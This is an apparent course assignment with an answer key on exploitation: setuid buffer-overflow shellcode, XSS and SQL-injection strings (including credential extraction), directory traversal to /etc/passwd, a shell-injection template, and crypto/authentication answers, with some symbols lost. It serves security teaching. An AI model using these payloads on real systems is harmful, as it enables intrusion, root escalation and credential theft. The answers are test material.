Assignment 4: Local & Application Exploits In this assignment, we explore remote to local and privilege escalation exploits used to gain or elevate attacker access to systems. Throughout this assignment we will see these exploits used at both the operating system as well as the application level, learn about how they happen and how we can prevent them (both as developers as well as system administrators). 1. Buffer Overflows (75 pts) In this section, you will be learning about buffer overflows in the stack, a common vulnerability in programs that allows you to run arbitrary code. This lab will require some programming in C, some knowledge of assembly, and a touch of debugging tools. Background Stack-based buffer overflows have been around for a long time and all indications are that they will continue to be a problem in the near future. Aleph One wrote the definitive paper on using this technique to exploit programs, Smashing The Stack For Fun And Profit. You should read this paper carefully. It will walk you through every aspect of overflowing the buffer, creating a shellcode, and ultimately exploiting a vulnerable program. It is very long and full of technical detail -- make sure to set aside plenty of time to work through it. Also keep in mind that your Linux version and gcc compiler may be different from those they used for the paper, so the numeric values in the examples shown in that paper (such as pointer value, number of bytes, etc.) could be different. Exploiting Several strategies have been created to counter these types of bugs in programs. The version of Linux installed on your machine employs two different kernel-based stack protection mechanisms. One randomizes stack addresses to make it difficult to predict locations of shellcode. The other places random canary values on the stack to protect stored addresses. You need to disable both of these mechanisms or else it will be difficult to exploit overflows on your system. To disable stack protection, run the script (as root or through sudo) /root/bin/disable-stack-protection. To re-enable stack protections, run /root/bin/enable-stack-protection. Note that if your system is ever rebooted, the stack protections will be re-enabled by default. To disable the placing of canary values in your executables, you need to use gcc-3.4, which is already installed. a. Download the zip file from strawman, examine the code in uppercase.c and lowercase.c. These programs are simple UNIX utilities that will accept a string involving both upper and lower case characters from the command line and return that string converted entirely to upper case or lower case characters. Do these programs have any internal buffers? Do they do any input length checking? Describe what seems, at first glance, to be unsafe. Provide comments on a line-by-line basis. (5 pts) The local variable buf is the internal buffer (512 bytes in length). In the for loop our input length is checked using strlen() but the validation against the internal buffer is not performed. The strcpy() function, issued without any check on the length of the input, could produce a buffer overflow (strncpy() should be used instead). The setuid() operation is also not recommended unless absolutely necessary. b. Now focus on uppercase.c. Run make to compile the program. Make sure you DO NOT compile the programs directly with gcc, as that will use gcc version 4 which inserts canary values. Run uppercase, and find a string input that will cause it to segmentation fault. Why does this happen? (5 pts) A string longer than about 524 bytes should cause the segmentation fault. This happens because the return instruction pointer (EIP) is overwritten with an illegal address by the overflowing buffer. c. Use gdb to run the program again with the same, very long, first argument (Hint: set args AAAAAAA...). What is the %eip address reported when it causes segmentation fault? Compare this value to your string's ASCII hexadecimal representation (Hint: man ascii). Determine the length of the shortest string needed to control %eip. (5 pts) The shortest length of string recorded in my test was 529 bytes. The %eip address should be the last 4 bytes of the shortest string that caused segmentation fault. d. Draw a diagram of the stack for uppercase which includes the stack frames for main() and strcpy() and all local variables for main(). Also, include the location of main()'s return address and how it gets overwritten by an overflown buf. Finally, include the arguments passed to the main() program in the diagram as well, relative to the stack frames. Exact offsets aren't that important here, but relative locations are (Hint: use print command to know the location of local variables, arguments, etc., e.g.: print &buf). (10 pts) Address 0x00000000 Contents Unused Memory strcpy()’s stack frame main()’s stack frame i buf[512] argv** 0xbffffffa argc Return pointer argc, argv[], environment, etc... If the diagram is drawn upside-down, it is also fine as long as everything is correct in relative terms. e. Write a new program in C which exploits this stack-based buffer overflow to execute a shell. Your exploit should embed a shellcode in the argv[1] buffer of uppercase and then overwrite the stack frame return address so that execution continues within that buffer when main() returns. The shellcode you need to use is: char scode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; The exploit program you will be writing should look like below: void main() { /* variable declaration here */ /* preparation for exploiting here */ /* then call execl() to invoke the uppercase program, where arg is a string (i.e. char[], or char*) */ execl("./uppercase", "./uppercase", arg, NULL); } As mentioned, remember to disable the stack protection and disable the canary values, otherwise, it will be much harder to exploit. Once you have a working exploit which executes a shell, make uppercase a setuid root program by running chmod u+s uppercase as root. Now, run your exploit again as a nonroot user. Once your shellcode runs, use the id(1) command to determine what user the shell is executed as. If everything works correctly, you'll have elevated privileges to root through this overflow. Please submit source code for your exploit that has comments on every line demonstrating that you understand how this works. Points will be deducted for less than thorough explanations. (30 pts) Before running the exploit, remember to disable the stack protection, and use gcc-3.4 for compilation. sample-exploit.c another-sample-exploit.c f. How would you modify the lowercase program to make it safe from buffer overflow attacks? (10 pts) The most basic thing that can be done is to replace strcpy with its “safe” cousin strncpy(buf, argv[1], length-of-str). An explicit strlen check is also a possible option. g. If buf were instead allocated via malloc() in these vulnerable programs, would the same techniques for exploitation work? Why or why not? (5 pts) malloc() allocates memory on the heap instead of the stack. Overflowing the heap for the purposes of an exploit is possible, but the techniques are much different and often require more effort, since helpful structures like return addresses and stack pointers don't generally live in the heap. h. What is different about executing a setuid program versus a non-setuid program? What are the dangers of setuid programs? Why are setuid programs sometimes necessary? (5 pts) setuid programs execute as the user who owns the binary, rather than the user who is executing it. If vulnerability exists in the setuid binary, then a local user could exploit it to take over the account that owns it. Often these are necessary, as many every-day tasks require privileged access to system calls where alternative privilege models are not available. 2. Application Exploits (100 + 20 pts) In this section, you will explore common vulnerabilities in applications. Your experiments on a webbased application will try to exploit vulnerabilities that are commonly found on these types of programs. a) Cross-site Scripting (20 pts) Cross-site scripting vulnerabilities are common in web applications. These flaws allow you to expose the interaction between users and a website. Read more about the different forms of XSS and how they are typically exploited. The application you will test on is at the URL: http://strawman/blog/. You should access this web site from either your Windows machine or over a SSH tunnel. Locate the login page for this application, and fuzz the form fields with HTML special characters to locate a cross-site scripting bug. a. Now, develop a proof-of-concept (PoC) exploit for this bug which embeds an image tag (eg. <img src="..." />) into the page (use any image URL you want). Your injected HTML characters must present a final page to the browser which is HTML compliant. Once you have developed a working PoC exploit, take a screen shot of the page in your browser. In addition, save the HTML source of the resulting, exploited page. Submit both of these in your report. Username: Tester"/></td></tr><tr><td><img src="url_to_an_image_file"><div class="foo Password: "/></td></tr><tr><td><img src="another_image_file" "><div class="bar The HTML code of the page after injection must not break the HTML compliant rule (e.g. opening tags must have closing tags). b. Find an additional XSS vulnerability on a page other than the login page. This second vulnerability should be accessible without having to log in. Write a short PoC exploit for this second bug and record just the string you inject. You do not need to save a screenshot or the full HTML source. Include in your report the string you used for your second XSS exploit along with the name of page and the name of the form element you attacked. The last link at the bottom of the page, which allows users to choose Printable friend view, contains an additional XSS vulnerability. The url is injected: http://strawman/blog/index.php?style=injected_html_code This security hole is also dangerous because by injecting to the url, the source code of the php pages can be found when viewing source of the returned page, for example: http://strawman/blog/index.php?style=index.php Note: any vulnerability in other pages (except the login page) is also ok. b) SQL Injection (30 + 20 pts) WARNING: In this section you will be manipulating the backend database of this application. There is a small chance that your attacks will break or disable the web application. Please think carefully about the attacks before you perform them, as other students need to use the same system. If you do break something, report it to the lab TA immediately so it can be fixed. SQL injection vulnerabilities are very serious flaws which open applications up to a whole host of database attacks. These vulnerabilities affect more than just web based applications and often allow the circumvention of authentication/access controls for information stored in a database. Also, SQL injection flaws can sometimes be the stepping stone used by attackers to fully compromise a database server. Read more about SQL injection through the provided references. You may also want to search the web for more information on the topic. a. Return to the login page of the weblog application. At least one SQL injection vulnerability exists in this form. Develop an exploit for this form which allows one to log in to the application without knowing a valid username or password. Hints: Imagine the SQL query a programmer might write to check a user's credentials. The backend database is MySQL. Also, the string -- is the SQL comment and behaves much the same as // does in C++. Record the resulting injection string you used to log in. (10 pts) Students must provide the injected SQL code that allows them to login successfully as a valid user. Example: Username: ' or 1=1-Password: ' or 1=1-b. Locate one another SQL injection vulnerability in some other page of the application. Develop a simple PoC exploit which demonstrates how you can manipulate the results of the query. (10 pts) An example: The feature of the viewentry.php page is listing the entry with a specified message id. We can change this behavior to list all entries of the weblog without navigating to the index.php page. The following code is injected to the msgid parameter of the viewentry.php page: msgid=1' or '1'='1 Note: any SQL code that changes the displayed result of a page (compared to the “official/expected” result) is considered as successful exploit. c. Bonus question: Write an SQL injection exploit which steals a username and password from this application's database. (20 pts) Students must show the method/code they used to obtain the correct username and password. The below SQL code can be used to retrieve the usernames and passwords: msgid=' union select 1, username, password, "" from adminuser where password <> ' Username and password of the admin user can be also discovered using shell command through SQL injection via sendmail.php (see Shell Command Injection section). d. Suppose a programmer needs to run an SQL query such as: SELECT * FROM mytable WHERE a='foo' AND b='bar' In his application, users can completely control the data in strings foo and bar. To protect his application against SQL injection the programmer decides to insert a backslash \ in front of all single quote characters provided by users in these strings. This is an acceptable form of escaping/encoding in his database system. For example, if a user provided a string "Let's drive to the beach!", it would be encoded in the SQL query as "Let\'s drive to the beach!". Therefore, inserting single quote characters would not allow attackers to break out of the explicit single quotes in the query. Describe why this protection alone would not prevent an SQL injection attack for this particular query, and give a sample set of strings which demonstrate the problem. (Hint: Recall that the attacker can control both strings in this query.) (10 pts) To manipulate the single quote, the attacker can use \' for each single quote he wants to inject. For example: The original query: SELECT * FROM mytable WHERE a='foo' AND b='bar' The injected code to the parameter a: \' or 1=1-The resulted query, which will list all rows in the table: SELECT * FROM mytable WHERE a='\\' or 1=1-- AND b='bar' c) Directory Traversal (25 pts) Directory traversal attacks are another, somewhat less common, class of application vulnerability which typically occurs because programmers trust some portion of a filename or file system path to be provided by users, without validation or sanitization. These flaws often result in unauthorized file retrieval and sometimes even facilitate remote execution attacks. Read more about directory traversal attacks and how they are typically exploited. a. Explore the weblog application and search for a user supplied parameter that might allow a directory traversal attack. Once you locate one, use it to download the system's /etc/passwd file. Submit the /etc/passwd file. (10 pts) Exploit the “Printable friendly format” feature mentioned in XSS attack above: http://strawman/blog/?style=../../../../../etc/passwd b. Pull down other files until you find positive evidence of what OS and version is hosting the website. Save these files for your report. (10 pts). Similar technique as above: http://strawman/blog/?style=../../../../../proc/version c. Suppose a programmer accepts a filename through a URL request parameter, in a script named safefromtraversal.php. In this script, the programmer removes all occurrences of the string '../' from the filename provided by clients. (In other words, the request parameter is searched for any occurrences of this string. Any found are replaced with the 0 length string, and later the parameter is used as a filename.) With this protection alone, would the script be secure against directory traversal attacks? If not, describe an attack to bypass this protection. (5 pts) Functions for string replacement in many programming languages don’t use recursive replacement, so the attackers can use ....// for each string ../ they want to inject. d) Shell Command Injection (25 pts) WARNING: In this section you will be running commands on the server hosting this application. There is a small chance that your attacks will break or disable the web server or application. Please think carefully about the attacks before you perform them, as other students need to use the same system. If you do break something, report it to the lab TA immediately so it can be fixed. Shell command injection, while somewhat rare, can be devastating to an application's security because these kinds of flaws generally allow remote execution of code and are usually easy to exploit. The problem usually lies in an application's use of external commands to accomplish certain tasks. Often, for the convenience of it, programmers will run external commands via the system shell or some equivalent interface. However, if user input is included in such commands (for instance, as command line parameters), then it is very difficult to prevent shell meta-character injection. Read more about these attacks and how they can be prevented (accessible only through your Windows VM.) a. Review the pages available in the weblog application and think about what pages are most likely to use an external command. Now, find and exploit one command injection vulnerability. To prove you can run commands on the server, write a file to /tmp named team-T.hack (where T is your team number) which contains the email addresses of all of your team members. This file may contain other garbage as well, but it should have your team members' email addresses somewhere in it. To test whether you were successful, you can read the file back in again with the directory traversal vulnerability you found earlier. Hint: You may use the directory traversal vulnerability to swipe the source code for many PHP scripts. Reviewing the sources will allow you to find such a hole very quickly. You need to describe the method and the command, url, etc. you used to perform the attack in your report. (15 pts) Students should obtain the source code of the sendmail.php page, then notice that the sendmail.php doesn’t check the input before running shell_exec(). The following exploit allows us to run arbitrary shell command via “Contact the Webmaster” page: Subject: any text you want here Body: '; <arbitrary shell command> | /usr/sbin/sendmail -f webmaster@strawman.nslab teamXX@teamXX-router.nslab ; /bin/echo ' The output of the executed arbitrary shell command can be read by running the mail program in the Linux machine (in the above code, teamXX@teamXX-router.nslab is used for the receiving email address). b. Consider the functions execl and system from the standard C library. Explain why using execl is safer than system. Why would a programmer be tempted to use system? (5 pts) The system() function takes only 1 argument as the command line string, which includes the command name and its arguments, and call the shell to execute this command line. Thus, the attacker can freely manipulate one or some of the arguments to break the current command into multiple arbitrary commands. The execl() function is safer because it takes the first argument as command name, and the others arguments as arguments for that command, and finally directly calls the command without using shell. Therefore, the attacker cannot manipulate either the command name, either the arguments, otherwise errors occur. The programmer, however, still loves to use system() function due to its ease. Moreover, using execl() function means the current process is replaced with the new process which runs the specified command. Hence, in order to return to the original process, the programmer should fork() before calling execl(). This is perhaps the biggest disadvantage of using execl(). c. Consider the following snippet of C code: snprintf(cmd, 1024, "whois %s >> /tmp/whois.log", ip); system(cmd); Suppose an attacker could completely control the content of the variable ip, and that this variable isn't checked for special characters. Name three different meta-characters or operators which could allow an attacker to "break out" of ip's current position in the string to run an arbitrary command. (5 pts) Three special meta-characters when using shell command are preferred by the attacker: “;”: this allows the attacker to run a new command after the command specified by the programmer. “|”: this allows the attacker to redirect the output of a command to the input of another command that is under controller by the attacker. “>” or “>>”: this allows the attacker to write or append the output of a command to a file that can be read by the attacker. 3. Impersonation, authentication and session keys (15 pts) a) Explain why it is a bad idea for the initiator in a mutual authentication protocol to send out the first challenge. [3] It is a bad idea for the initiator in a mutual authentication protocol to send out the first challenge as in that case, following attacks are possible. Man in the middle attack If the initiator is allowed to send out the first challenge, then an intruder can initiate the communication and be able to carry out Man in the middle attack successfully to impersonate a valid user as shown. A I B 1. I’m A, C1 3. I’m B, C2 4. I’m A, E (C2), C3 2.I’m B, E (C1), C2 5.E (C2) Here, I communicates with B as if it is A, using A as a decryptor. Connection Attack An intruder can initiate the communication and be able to carry out connection attack successfully to impersonate a valid user as shown below. I I’m A, C1 B I’m B E(C1), C2 I’m C, C2 I’m B E(C2), C3 E(C2) Here, I communicates with B as if it is A using B itself as a decryptor through multiple connections. b) Consider a network such as the Internet where Trudy can inject spoofed packets in an attempt to hijack a conversation between Alice and Bob. Trudy can send packets with Alice’s address as the source address to Bob but the network will not deliver packets with Alice’s address as the destination address to Trudy. What are some problems in Trudy attempting to transmit a file to Bob by pretending to be Alice. [3] Following are the problems Trudy will face: 1. When Trudy sends a file to Bob as a stream of packets over TCP, firstly it is difficult to setup a TCP connection with three way handshake as Bob would send SYN ACK to Alice and not Trudy. 2. If Trudy tries to hijack an existing communication between Alice and Bob and send the file over the same, then Bob will continuously send acknowledgements for each packet to Alice. There is no way for Trudy to figure out if Bob receives the exactly same file as Trudy had sent it. 3. Trudy cannot use flow control mechanism due to lack of any ACK from Bob and hence does not know the optimal rate at which it should transmit data in order to avoid packet loss at Bob’s end. 4. If the communication between Trudy and Bob is over FTP, Trudy will have problem in setting up the FTP connection. In FTP connection, Trudy has to set up a data connection on the port Bob sends in the control line. Since Trudy does not get information sent by Bob on control line, she cannot set up FTP data connection with Bob to send a file. 5. Even if Trudy tries to hijack an existing FTP session between Alice and Bob, She will not get any information in case of connection reset or packet loss due to above mentioned problems in TCP connection. c) Let Alice and Bob share the secret key K. Let R be a random string that is exchanged in the clear during the authentication phase. Why are the following bad choices as session keys: EK(K), ER+K(K) and RK? [5] EK(K) : If we use EK(K), we would have same session key for all sessions, which does not add much security over not having a session key at all. ER+K(K) : Consider we use ER+K (K) as a session key. Since R is being transmitted in clear, the attacker can easily get hold of R. In that case, the difficulty of guessing session key reduces to guessing shared secret – K. This is similar to previous case. Also, in some cases, we may want to establish a session using shared secret K and give relatively untrusted software the session key as mentioned in 4th point of answer d. In this case, if we use ER+K(K) as a session key, we need to give out the shared key as well to the untrusted software. R K: R K is not a good choice for session key because, if the attacker gets session key S, he can get shared secret K as well by taking S R, where C is cipher text block. d) What are some reasons for having a session key in the first place. Why not simply use the shared secret for encrypting the session? [4] Following are the reasons for having a session key different from shared secret: 1. Keys wear out if used a lot. If we use session key same as shared secret K, the intruder will be getting access to more amount of data encrypted with the key K. This increases chances of an attacker being able to successfully find the key K. 2. The shared secret K generally has longer validity time than a single session. If we use K as a session key, then an attacker might be able to replay the messages from an old conversation. 3. If a long-term shared secret key is compromised, it is desirable to prevent an old recorded message from being decryptable. If every conversation is encrypted with the same key K, then this would be difficult to achieve. 4. We may want to establish a session and give to relatively untrusted software the session key, which is good only for that conversation, rather than giving away the long-term shared secret. 4. Secret-key Authentication (15 pts) Alice KDC: N1, Alice wants Bob KDC Alice: KA(N1,KAB,Bob,ticket); ticket = KB(KAB,Alice) Alice Bob: ticket, KAB(N2) Bob Alice: KAB(N2-1,N3) Alice Bob: KAB(N3-1) a) Explain how, in the absence of N1, Trudy can impersonate Bob using an old key of Bob’s and an old reply from the KDC. [5] Suppose that N1 is not used at all. Trudy gets hold of an old key of Bob KBold as well as an old reply from KDC, Rold. When Alice requests for conversation with Bob, Trudy first impersonates KDC and replays old message - Rold ,which looks like an ordinary reply from KDC. Trudy then impersonates Bob to Alice, because she knows the key - KBold and hence can decrypt the ticket to extract KAB . Alice wants Bob Rold = KA (KAB, Bob, ticket); Ticketold = KBold(KAB,Alice) Alice Ticketold, KAB(N2) Trudy KAB(N2-1,N3) KAB(N3-1) b) Why does the reply from KDC to Alice contain “Bob”? [3] Suppose there is no “Bob” in reply from KDC to Alice, then Trudy changes initial request from Alice to KDC to {N1, “Alice”, “Trudy”}. Complying with the request it gets, KDC sends ticket encrypted with key for Trudy, KT instead of key for Bob, KB. Now, Alice uses this ticket for setting up the conversation. Since, Trudy can decrypt the ticket, she can impersonate Bob. N1, Alice,Bob Trudy N1, Alice,Trudy KDC Trudy KA (KAT, ticket); Ticket = KT(KAT, Alice) Alice Ticket, KAT(N2) KAT(N2-1,N3) Trudy KAT(N3-1) c) Explain how Trudy can impersonate Alice using an old key of Alice’ and an old reply from the KDC [5] Suppose that Trudy gets hold of an old key of Alice - KAold and an old reply from KDC – Rold . Now Rold is encrypted using KAold and hence Trudy can decrypt the same. Trudy skips the first two steps of the protocol. She extracts Ticketold out of Rold and sends it to Bob to initiate the conversation. Assuming that Bob’s secret key – KB is not changed, Bob finds the Ticketold perfectly valid request coming from Alice and proceeds with normal conversation setup. Thus, Trudy can impersonate Alice. Trudy Ticketold, KAB(N2) Bob KAB(N2-1,N3) KAB(N3-1) d) What is the name of the authentication protocol that underlies Kerberos? [2] The protocol used in Kerberos is Needham-Schroeder protocol. 5. Modular arithmetic (15 pts) a) Which of the numbers 1,2,…,20 are coprime to 21? What is (21)? [5] Numbers between 1-20, which are coprime to 21 are: 1,2,4,5,8,10,11,13,16,17,19,20. (21) = 12 b) What is 3^2008 mod 11? [4] 3^2008 mod 11 = 3^ (2008 mod 10) mod 11= 3^8 mod 11= 6561 mod 11 = 5 c) Name the two mathematical problems at the heart of most public key systems? [2] Two mathematical problems at the heart of most public key systems are factorization and discrete log. d) What is repeated squaring and what is it used to compute? [4] “Repeated squaring” is an algorithm used for the fast computation of large integer powers of a number. In this, for any even power n, xn is expressed as xn/2 * xn/2, while an odd power n is first expressed in terms of nearest even power and then reduced further by repeating this. This reduces number of steps required for calculating xn to log 2 n steps as compared to naïve algorithm requiring n-1 steps. Note: Diagram from Wikipedia.